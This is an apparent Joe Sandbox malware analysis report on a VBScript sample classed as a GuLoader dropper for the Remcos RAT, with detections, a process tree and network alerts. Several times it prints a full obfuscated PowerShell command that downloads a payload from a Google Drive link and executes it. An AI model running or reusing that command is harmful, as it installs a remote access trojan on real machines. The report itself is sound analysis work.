Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
CO894GOV2O25.vbs

Overview

General Information

Sample name:CO894GOV2O25.vbs
Analysis ID:1633356
MD5:3ab38d8e692322e55deb91ea33e8305d
SHA1:eeca584df47dca8a53769ed5a8a76223eefb401c
SHA256:dc8799d45d113dd0f36ecd532c6bf3a1040d29ec296bfcce82a9d1d88f17b762
Tags:vbsuser-abuse_ch
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Confidence:100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Potential evasive VBS script found (sleep loop)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 4212 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\CO894GOV2O25.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • PING.EXE (PID: 7340 cmdline: ping Host_6637.6637.6637.657e MD5: 2F46799D79D22AC72C241EC0322B011D)
      • conhost.exe (PID: 7348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7424 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Taltegns;function janey($Naturprodukt){ .($Glassliberes) ($Naturprodukt)} function Infractor($Naturalization){$Reacquainted129=4;do{$Cozies104+=$Naturalization[$Reacquainted129];$Reacquainted129+=5;$Bemoil=Format-List} until(!$Naturalization[$Reacquainted129])$Cozies104}$Vagttaarnenes=Infractor 'W xbNparaeCentTR ck. Blow';$Vagttaarnenes+=Infractor 'Ba nEPjevbAwakc,arelTobaIBlepESqu NSprot';$Dysbulic=Infractor 'TekrMGroooMindzafpriSirilD bil DigaDa b/';$Altnglerne92=Infractor 'Imp TEthylFremsGrap1Spot2';$Segregerede=' Rig[MaksNNe,oEBechtB.ro.p.gwS k peKam.rIsagvAandiForpC SpeeVaskPSpgeorelai PhoNkompTHumoM.eroa m rnSangA alcG Rele BilRAlop]smre:Kiss: ejssCbfte sivc Su UOpharKar i ongTPen yAgnopHarlr.ariOnecet F.ro.jenCMjesoCollLRime=D.mp$WencaEscalPhostOvernBaneGTolvLScraESaldRU,pfNSgetE Asy9flyw2';$Dysbulic+=Infractor ' fre5S,rg. Car0Opse Resi(SygeW S.ci FlynPseudSpekoM.ljwK lvsUl.i ModuN iceT Unv Barn1Homo0Trib.Biod0Be i;Be t cod,WCar ih llnBefo6Mist4Nonn;Krad FripxF rs6apra4Stan;Rec. MarrArvevClas:Rhod1Ufo 3 Fol4 Opf.Unif0L vs)Ud a SickG erceMasocTrogk,onroGen,/Gono2,igo0K,pi1mass0U.in0 Dal1Fiel0 ata1 Ent B,deFOv,riPar rIne.eOve f oico Mi xSuda/ We 1Knig3Macu4 Sco.Ko t0';$Quillaias180=Infractor 'LocauSlagsBakkE Exirtogd-in dAHjlpgUn,ee He NUnunT';$Aabningstidernes=Infractor ' upmhKeglt .rntLe,sptri s Til: hor/San /OctadKnsfrMik.i sliv Ante U.u. ,legEft oquafoPolyg Prol nae Aut.S,idcCorroJug mOffe/ Re u KatcSpl ? ,loeMe axRi,dpUnd,oSp,rrSaldtLion=Un vdErhvoConcw abnEpiclskovoMissaKunsd Fro&UnsaiAntidOpsu=Aspa1Dep,yIron_Fr gMPennUEndo1.matISammxMelotUmrkx ,uiQUdhuaMoraDU.ign,wee_KundfFi a6Sala5 VicC HornLouv0 T gb FerFSti 8BedlLChlof,isc0.tlnXBuscC I o8AldeUCong0U deI';$Rotationspumperne=Infractor ' Ugi>';$Glassliberes=Infractor 'DormitilieV weX';$Eliquating='Gulvs';$Klatrende='\Udskilleres.Bre';janey (Infractor ',itr$OutcGUnscl KelO ,ncBnoneaResulAad,:,rspiC azN F,lTSpeer .blaOceaVrem E AscnSchcs ill= et$ElkaEWar nE.chvRdbe:NoncaLas.P UndpDiamDNegra FortInadaSylv+Skry$ yrbkarseLSalmAf rgTUnpir AirESc.rNSkrad esE');janey (Infractor ' Erk$PhysgBenzLHemaOArkobLokaaR adlSkul:LudwMS riIGratCCharM OctAStatcSmre=R fu$IngeaAnesa esBLillnSandiplynN mregAgenS A aT uttiCappDFu,dE,forRhollN Unfeu,shS Nay.KerySTriepHer LOgleILdenT ag(ev,j$Popur telO Best GalASo ntAuxiIRegrOPerfn munSTillPSam uAlvemSerpp Ac,eWarprLandN Pg ED,fr)');janey (Infractor $Segregerede);$Aabningstidernes=$Micmac[0];$Bayer=(Infractor 'cler$ ensgSyg.ltrocoUndebBaneAVavaLPluk: indeAlinmchilUA delNonpGSti.eNonfrRedbi outNCafeGpho eU taRT leNBarrECoenSOgr,= ,lbnCompE,ehaWGr n-uncaOinteB QabJScenEOutfCDoubTRen. tabeSReb.yPoleSsup,tOpbeEDy fMExpo.Iv.k$ RapvPlebA igeGPa it ,ipt .leaErgoaClu r ricnHfl EFo bN MelEpa,ls');janey ($Bayer);janey (Infractor 'L.fg$Frafe obemBi.su.onsl ,cagKa.eeMenurSpe,imochnUn,eg.rikeFor rKruknseyceUndusOmbr.Mo aH Rame,nuaaDupldPa le Oekr.edisNeph[Barm$ ilaQSvaruGra iExtrlBetyl BucaRosmi ,veaan vs S p1D.lg8D,to0D sc]Obte=Vent$TydeDFlaay TitsAntibPropuU sylStefiOrbic');$Bestuknes=Infractor 'Red $Theae AmymDeltuMunil Ve gPoime RearUdpiiPushnBegrg StoeTaj,r.ogsnA omePrimsIndi.mo oDtynwoG.newMilln P,olarbeoFrkaaSimidBuk F.ueriFer,lBelaeVrdi(circ$DigeAFo vaUnchbIndknIdoliPr snHorogBrissDefetBl.niThrudSkrueF rvrSkoln ereRup s nd,Unre$ DiaQP nsuHjema rtedS.acr D,muMethpTantoFhvslMiljaFaatrHypn)';$Quadrupolar=$Intravens;janey (Infractor ' ,is$Tvr,GAmorl OveOShivbMyreA A.glThio: dbrAAutofConah oadaCon aAnter caoe SurnRedeDstjgE,dli=Spe (SkoltSnubeEcstss utTCoun-Kam P MaraDic t rchhoppu Kha$HaneQHu,euCo.la A adNonhrCondU argp iblOBedmlM roaSu.fRNurs)');while (!$Afhaarende) {janey (Infractor 'Ga,t$Tvisg SymlEjenoHjdebT ntaCovelRepa: SveTMas uPampmHoselIndkeoverpVolflPh,waBib dAcets HaneSvrdrH ftnMiljeGribs.ydr=B in$AnsaSAllocLineaUdn.pWa,ru SellCoima') ;janey $Bestuknes;janey (Infractor ' Non[TilrtSkruhKinsRGeneeRad a Slid C,aiUdlaN SubgRegn.EtioT GasHMedvRC loE rkaUndedIndb]C rm:Gemm: ilosveksLStorEScapEChifpArga(Itch4Komp0 Pe 0S ri0st,e)');janey (Infractor ' Ov.$Paing St LUn eoSkalBtoxia SlalFord:Ba eAjehoFSemohH rlARimma ,knrToneeint n akvd BasECast=Tegn(WagnTOvereJokks alltB.rn- lodp kdsAMu.dT So,H rag Eddi$ .laqUntaU RovaFracDBri rModauClerPSkanO Pr lNonea mbyR Cin)') ;janey (Infractor 'L.go$BrneGDiscl MonOCalcb .amAOlshlsobe: T,kbB okRStatUj degHellS OmsRMortEA.caTOeco=Mod,$ThiogFriklEkstORe mbIneaAErkllLend: tjer H re CoaM Te.oTripnHjadtSvidePilaRTs riSe iN M ngSemie istRBhutnRumkERede+Both+ D p%Jas $ HunmOmveILnnicFameMGracATr,hCKu s.PancC ksOM.niuBasensamlt') ;$Aabningstidernes=$Micmac[$Brugsret]}$Aroideous208=323081;$Eneboers=29797;janey (Infractor 'Bude$FoerGSas,lAbanOFjerb St,a.alsllign:UtrimFar aSl,kCHorsKSkriLProgeMeso pos=Blen brieGWiike KantTant- .lsCCindOIsacnVelsTFadeeGrubNRenhTW.er Dyne$.uboqUnunU enoADelmDCarpRKlasUBir,pUn mo.heslInteALievr');janey (Infractor 'Ta,r$Polyg Gral P,loUnbrbOpskaSavol Sem:Tan SNon oSg kl rwdcDis rMonaeOutrmunspePi irH.ndsSulf Padd=Amat N.n[U anSnon y HovsAbsetUdpleSpitmUndi.BlanC F eoSkrinEna v Pe ePrefr MurtKl d]Aftg:A lo:KongFSurcr Undo ilim laBKu ea TemsTaboe vi6Fora4 NonSDip.tNga r roi StenBu tg ,ac( Top$DollMTrana TercKonsk Berl AndeMeas)');janey (Infractor 'A hv$AfruGFatnlIndoOFlyeBIsomaDes LRewa:UndeSAdvoY Forn nsaCDeceoGestp v.daT detchirEB.aisMi k Fre = nte Praa[ BssSMagnY.andSBlodTFngseBrugmSter.PesttLangeGa iXPro.tsymp. ordebo bnExpecJuleOD.laD KanIFyrsn E igfutu] Sek:Un.p:FranaEksis VgtC rgli PoliDau..SteggUtereV nitSdcesFre,T Sagr.oqui rinSengg una(Rh d$Nects .ecoErnhlA skCDep rExpaeStramInt.eAfreRBallSBurg)');janey (Infractor 'Lepi$Stj gDruplUngeONud bTi,fA ndsl any:AnarB HypoProvgEnv dOveraForvGMoraeAeronprin= Teg$ M.dSUdtmY IllNHockCBrudO MaiP kemaP thT Co,ETroms E p.VitrsmetauJu,ebBoidsSeveT Botr Di i fhuNMi pG Ver(A tn$DoucAAl aRA,toOLigniBesvd Sk,E RejoDa luPl ySHv,d2Tr k0Blom8styl,Cu h$Elice StiNAareeNon BSpolo ,inEPianR SorSDepu)');janey $Bogdagen;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 7816 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Taltegns;function janey($Naturprodukt){ .($Glassliberes) ($Naturprodukt)} function Infractor($Naturalization){$Reacquainted129=4;do{$Cozies104+=$Naturalization[$Reacquainted129];$Reacquainted129+=5;$Bemoil=Format-List} until(!$Naturalization[$Reacquainted129])$Cozies104}$Vagttaarnenes=Infractor 'W xbNparaeCentTR ck. Blow';$Vagttaarnenes+=Infractor 'Ba nEPjevbAwakc,arelTobaIBlepESqu NSprot';$Dysbulic=Infractor 'TekrMGroooMindzafpriSirilD bil DigaDa b/';$Altnglerne92=Infractor 'Imp TEthylFremsGrap1Spot2';$Segregerede=' Rig[MaksNNe,oEBechtB.ro.p.gwS k peKam.rIsagvAandiForpC SpeeVaskPSpgeorelai PhoNkompTHumoM.eroa m rnSangA alcG Rele BilRAlop]smre:Kiss: ejssCbfte sivc Su UOpharKar i ongTPen yAgnopHarlr.ariOnecet F.ro.jenCMjesoCollLRime=D.mp$WencaEscalPhostOvernBaneGTolvLScraESaldRU,pfNSgetE Asy9flyw2';$Dysbulic+=Infractor ' fre5S,rg. Car0Opse Resi(SygeW S.ci FlynPseudSpekoM.ljwK lvsUl.i ModuN iceT Unv Barn1Homo0Trib.Biod0Be i;Be t cod,WCar ih llnBefo6Mist4Nonn;Krad FripxF rs6apra4Stan;Rec. MarrArvevClas:Rhod1Ufo 3 Fol4 Opf.Unif0L vs)Ud a SickG erceMasocTrogk,onroGen,/Gono2,igo0K,pi1mass0U.in0 Dal1Fiel0 ata1 Ent B,deFOv,riPar rIne.eOve f oico Mi xSuda/ We 1Knig3Macu4 Sco.Ko t0';$Quillaias180=Infractor 'LocauSlagsBakkE Exirtogd-in dAHjlpgUn,ee He NUnunT';$Aabningstidernes=Infractor ' upmhKeglt .rntLe,sptri s Til: hor/San /OctadKnsfrMik.i sliv Ante U.u. ,legEft oquafoPolyg Prol nae Aut.S,idcCorroJug mOffe/ Re u KatcSpl ? ,loeMe axRi,dpUnd,oSp,rrSaldtLion=Un vdErhvoConcw abnEpiclskovoMissaKunsd Fro&UnsaiAntidOpsu=Aspa1Dep,yIron_Fr gMPennUEndo1.matISammxMelotUmrkx ,uiQUdhuaMoraDU.ign,wee_KundfFi a6Sala5 VicC HornLouv0 T gb FerFSti 8BedlLChlof,isc0.tlnXBuscC I o8AldeUCong0U deI';$Rotationspumperne=Infractor ' Ugi>';$Glassliberes=Infractor 'DormitilieV weX';$Eliquating='Gulvs';$Klatrende='\Udskilleres.Bre';janey (Infractor ',itr$OutcGUnscl KelO ,ncBnoneaResulAad,:,rspiC azN F,lTSpeer .blaOceaVrem E AscnSchcs ill= et$ElkaEWar nE.chvRdbe:NoncaLas.P UndpDiamDNegra FortInadaSylv+Skry$ yrbkarseLSalmAf rgTUnpir AirESc.rNSkrad esE');janey (Infractor ' Erk$PhysgBenzLHemaOArkobLokaaR adlSkul:LudwMS riIGratCCharM OctAStatcSmre=R fu$IngeaAnesa esBLillnSandiplynN mregAgenS A aT uttiCappDFu,dE,forRhollN Unfeu,shS Nay.KerySTriepHer LOgleILdenT ag(ev,j$Popur telO Best GalASo ntAuxiIRegrOPerfn munSTillPSam uAlvemSerpp Ac,eWarprLandN Pg ED,fr)');janey (Infractor $Segregerede);$Aabningstidernes=$Micmac[0];$Bayer=(Infractor 'cler$ ensgSyg.ltrocoUndebBaneAVavaLPluk: indeAlinmchilUA delNonpGSti.eNonfrRedbi outNCafeGpho eU taRT leNBarrECoenSOgr,= ,lbnCompE,ehaWGr n-uncaOinteB QabJScenEOutfCDoubTRen. tabeSReb.yPoleSsup,tOpbeEDy fMExpo.Iv.k$ RapvPlebA igeGPa it ,ipt .leaErgoaClu r ricnHfl EFo bN MelEpa,ls');janey ($Bayer);janey (Infractor 'L.fg$Frafe obemBi.su.onsl ,cagKa.eeMenurSpe,imochnUn,eg.rikeFor rKruknseyceUndusOmbr.Mo aH Rame,nuaaDupldPa le Oekr.edisNeph[Barm$ ilaQSvaruGra iExtrlBetyl BucaRosmi ,veaan vs S p1D.lg8D,to0D sc]Obte=Vent$TydeDFlaay TitsAntibPropuU sylStefiOrbic');$Bestuknes=Infractor 'Red $Theae AmymDeltuMunil Ve gPoime RearUdpiiPushnBegrg StoeTaj,r.ogsnA omePrimsIndi.mo oDtynwoG.newMilln P,olarbeoFrkaaSimidBuk F.ueriFer,lBelaeVrdi(circ$DigeAFo vaUnchbIndknIdoliPr snHorogBrissDefetBl.niThrudSkrueF rvrSkoln ereRup s nd,Unre$ DiaQP nsuHjema rtedS.acr D,muMethpTantoFhvslMiljaFaatrHypn)';$Quadrupolar=$Intravens;janey (Infractor ' ,is$Tvr,GAmorl OveOShivbMyreA A.glThio: dbrAAutofConah oadaCon aAnter caoe SurnRedeDstjgE,dli=Spe (SkoltSnubeEcstss utTCoun-Kam P MaraDic t rchhoppu Kha$HaneQHu,euCo.la A adNonhrCondU argp iblOBedmlM roaSu.fRNurs)');while (!$Afhaarende) {janey (Infractor 'Ga,t$Tvisg SymlEjenoHjdebT ntaCovelRepa: SveTMas uPampmHoselIndkeoverpVolflPh,waBib dAcets HaneSvrdrH ftnMiljeGribs.ydr=B in$AnsaSAllocLineaUdn.pWa,ru SellCoima') ;janey $Bestuknes;janey (Infractor ' Non[TilrtSkruhKinsRGeneeRad a Slid C,aiUdlaN SubgRegn.EtioT GasHMedvRC loE rkaUndedIndb]C rm:Gemm: ilosveksLStorEScapEChifpArga(Itch4Komp0 Pe 0S ri0st,e)');janey (Infractor ' Ov.$Paing St LUn eoSkalBtoxia SlalFord:Ba eAjehoFSemohH rlARimma ,knrToneeint n akvd BasECast=Tegn(WagnTOvereJokks alltB.rn- lodp kdsAMu.dT So,H rag Eddi$ .laqUntaU RovaFracDBri rModauClerPSkanO Pr lNonea mbyR Cin)') ;janey (Infractor 'L.go$BrneGDiscl MonOCalcb .amAOlshlsobe: T,kbB okRStatUj degHellS OmsRMortEA.caTOeco=Mod,$ThiogFriklEkstORe mbIneaAErkllLend: tjer H re CoaM Te.oTripnHjadtSvidePilaRTs riSe iN M ngSemie istRBhutnRumkERede+Both+ D p%Jas $ HunmOmveILnnicFameMGracATr,hCKu s.PancC ksOM.niuBasensamlt') ;$Aabningstidernes=$Micmac[$Brugsret]}$Aroideous208=323081;$Eneboers=29797;janey (Infractor 'Bude$FoerGSas,lAbanOFjerb St,a.alsllign:UtrimFar aSl,kCHorsKSkriLProgeMeso pos=Blen brieGWiike KantTant- .lsCCindOIsacnVelsTFadeeGrubNRenhTW.er Dyne$.uboqUnunU enoADelmDCarpRKlasUBir,pUn mo.heslInteALievr');janey (Infractor 'Ta,r$Polyg Gral P,loUnbrbOpskaSavol Sem:Tan SNon oSg kl rwdcDis rMonaeOutrmunspePi irH.ndsSulf Padd=Amat N.n[U anSnon y HovsAbsetUdpleSpitmUndi.BlanC F eoSkrinEna v Pe ePrefr MurtKl d]Aftg:A lo:KongFSurcr Undo ilim laBKu ea TemsTaboe vi6Fora4 NonSDip.tNga r roi StenBu tg ,ac( Top$DollMTrana TercKonsk Berl AndeMeas)');janey (Infractor 'A hv$AfruGFatnlIndoOFlyeBIsomaDes LRewa:UndeSAdvoY Forn nsaCDeceoGestp v.daT detchirEB.aisMi k Fre = nte Praa[ BssSMagnY.andSBlodTFngseBrugmSter.PesttLangeGa iXPro.tsymp. ordebo bnExpecJuleOD.laD KanIFyrsn E igfutu] Sek:Un.p:FranaEksis VgtC rgli PoliDau..SteggUtereV nitSdcesFre,T Sagr.oqui rinSengg una(Rh d$Nects .ecoErnhlA skCDep rExpaeStramInt.eAfreRBallSBurg)');janey (Infractor 'Lepi$Stj gDruplUngeONud bTi,fA ndsl any:AnarB HypoProvgEnv dOveraForvGMoraeAeronprin= Teg$ M.dSUdtmY IllNHockCBrudO MaiP kemaP thT Co,ETroms E p.VitrsmetauJu,ebBoidsSeveT Botr Di i fhuNMi pG Ver(A tn$DoucAAl aRA,toOLigniBesvd Sk,E RejoDa luPl ySHv,d2Tr k0Blom8styl,Cu h$Elice StiNAareeNon BSpolo ,inEPianR SorSDepu)');janey $Bogdagen;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 7824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 8184 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 2152 cmdline: "C:\Windows\System32\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.1963821003.0000000008110000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    00000010.00000002.2186165556.00000000098DD000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000C.00000002.1949177684.00000000054D3000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
        0000000C.00000002.1963956226.000000000C5F3000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          00000009.00000002.1540197391.0000013ADEC14000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
            Click to see the 4 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_7424.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi64_7424.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xfc45:$b2: ::FromBase64String(
              • 0xcfb0:$s1: -join
              • 0x675c:$s4: +=
              • 0x681e:$s4: +=
              • 0xaa45:$s4: +=
              • 0xcb62:$s4: +=
              • 0xce4c:$s4: +=
              • 0xcf92:$s4: +=
              • 0xf347:$s4: +=
              • 0xf3c7:$s4: +=
              • 0xf48d:$s4: +=
              • 0xf50d:$s4: +=
              • 0xf6e3:$s4: +=
              • 0xf767:$s4: +=
              • 0xd7cf:$e4: Get-WmiObject
              • 0xd9be:$e4: Get-Process
              • 0xda16:$e4: Start-Process
              amsi32_7816.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xa7be:$b2: ::FromBase64String(
              • 0x9848:$s1: -join
              • 0x2ff4:$s4: +=
              • 0x30b6:$s4: +=
              • 0x72dd:$s4: +=
              • 0x93fa:$s4: +=
              • 0x96e4:$s4: +=
              • 0x982a:$s4: +=
              • 0x1360d:$s4: +=
              • 0x1368d:$s4: +=
              • 0x13753:$s4: +=
              • 0x137d3:$s4: +=
              • 0x139a9:$s4: +=
              • 0x13a2d:$s4: +=
              • 0xa067:$e4: Get-WmiObject
              • 0xa256:$e4: Get-Process
              • 0xa2ae:$e4: Start-Process
              • 0x142af:$e4: Get-Process

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\CO894GOV2O25.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\CO894GOV2O25.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 496, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\CO894GOV2O25.vbs", ProcessId: 4212, ProcessName: wscript.exe
              Sigma detected: Msiexec Initiated Connection
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 216.58.212.174, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 8184, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49697
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\CO894GOV2O25.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\CO894GOV2O25.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 496, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\CO894GOV2O25.vbs", ProcessId: 4212, ProcessName: wscript.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Taltegns;function janey($Naturprodukt){ .($Glassliberes) ($Naturprodukt)} function Infractor($Naturalization){$Reacquainted129=4;do{$Cozies104+=$Naturalization[$Reacquainted129];$Reacquainted129+=5;$Bemoil=Format-List} until(!$Naturalization[$Reacquainted129])$Cozies104}$Vagttaarnenes=Infractor 'W xbNparaeCentTR ck. Blow';$Vagttaarnenes+=Infractor 'Ba nEPjevbAwakc,arelTobaIBlepESqu NSprot';$Dysbulic=Infractor 'TekrMGroooMindzafpriSirilD bil DigaDa b/';$Altnglerne92=Infractor 'Imp TEthylFremsGrap1Spot2';$Segregerede=' Rig[MaksNNe,oEBechtB.ro.p.gwS k peKam.rIsagvAandiForpC SpeeVaskPSpgeorelai PhoNkompTHumoM.eroa m rnSangA alcG Rele BilRAlop]smre:Kiss: ejssCbfte sivc Su UOpharKar i ongTPen yAgnopHarlr.ariOnecet F.ro.jenCMjesoCollLRime=D.mp$WencaEscalPhostOvernBaneGTolvLScraESaldRU,pfNSgetE Asy9flyw2';$Dysbulic+=Infractor ' fre5S,rg. Car0Opse Resi(SygeW S.ci FlynPseudSpekoM.ljwK lvsUl.i ModuN iceT Unv Barn1Homo0Trib.Biod0Be i;Be t cod,WCar ih llnBefo6Mist4Nonn;Krad FripxF rs6apra4Stan;Rec. MarrArvevClas:Rhod1Ufo 3 Fol4 Opf.Unif0L vs)Ud a SickG erceMasocTrogk,onroGen,/Gono2,igo0K,pi1mass0U.in0 Dal1Fiel0 ata1 Ent B,deFOv,riPar rIne.eOve f oico Mi xSuda/ We 1Knig3Macu4 Sco.Ko t0';$Quillaias180=Infractor 'LocauSlagsBakkE Exirtogd-in dAHjlpgUn,ee He NUnunT';$Aabningstidernes=Infractor ' upmhKeglt .rntLe,sptri s Til: hor/San /OctadKnsfrMik.i sliv Ante U.u. ,legEft oquafoPolyg Prol nae Aut.S,idcCorroJug mOffe/ Re u KatcSpl ? ,loeMe axRi,dpUnd,oSp,rrSaldtLion=Un vdErhvoConcw abnEpiclskovoMissaKunsd Fro&UnsaiAntidOpsu=Aspa1Dep,yIron_Fr gMPennUEndo1.matISammxMelotUmrkx ,uiQUdhuaMoraDU.ign,wee_KundfFi a6Sala5 VicC HornLouv0 T gb FerFSti 8BedlLChlof,isc0.tlnXBuscC I o8AldeUCong0U deI';$Rotationspumperne=Infractor ' Ugi>';$Glassliberes=Infractor 'DormitilieV weX';$Eliquating='Gulvs';$Klatrende='\Udskilleres.Bre';janey (Infractor ',itr$OutcGUnscl KelO ,ncBnoneaResulAad,:,rspiC azN F,lTSpeer .blaOceaVrem E AscnSchcs ill= et$ElkaEWar nE.chvRdbe:NoncaLas.P UndpDiamDNegra FortInadaSylv+Skry$ yrbkarseLSalmAf rgTUnpir AirESc.rNSkrad esE');janey (Infractor ' Erk$PhysgBenzLHemaOArkobLokaaR adlSkul:LudwMS riIGratCCharM OctAStatcSmre=R fu$IngeaAnesa esBLillnSandiplynN mregAgenS A aT uttiCappDFu,dE,forRhollN Unfeu,shS Nay.KerySTriepHer LOgleILdenT ag(ev,j$Popur telO Best GalASo ntAuxiIRegrOPerfn munSTillPSam uAlvemSerpp Ac,eWarprLandN Pg ED,fr)');janey (Infractor $Segregerede);$Aabningstidernes=$Micmac[0];$Bayer=(Infractor 'cler$ ensgSyg.ltrocoUndebBaneAVavaLPluk: indeAlinmchilUA delNonpGSti.eNonfrRedbi outNCafeGpho eU taRT leNBarrECoenSOgr,= ,lbnCompE,ehaWGr n-uncaOinteB QabJScenEOutfCDoubTRen. tabeSReb.yPoleSsup,tOpbeEDy fMExpo.Iv.k$ RapvPlebA igeGPa it ,ipt .leaErgoaClu r ricnHfl EFo bN MelEpa,ls');janey ($Bayer);janey (Infractor 'L.fg$Frafe obemBi.su.onsl ,cagKa.eeMenurSpe,imochnUn,eg.rikeFor rKruknseyceUndusOmbr.Mo aH Rame,nuaaDupldPa le Oekr.edisNeph[Barm$ ilaQSvaruGra iExtrlBetyl BucaRos

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-10T09:19:11.043519+010028033053Unknown Traffic192.168.2.649689216.58.212.174443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-10T09:20:18.261217+010028032702Potentially Bad Traffic192.168.2.649697216.58.212.174443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000010.00000002.2186165556.00000000098DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Joe Sandbox ML detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.7% probability
              Source: unknownHTTPS traffic detected: 216.58.212.174:443 -> 192.168.2.6:49688 version: TLS 1.2
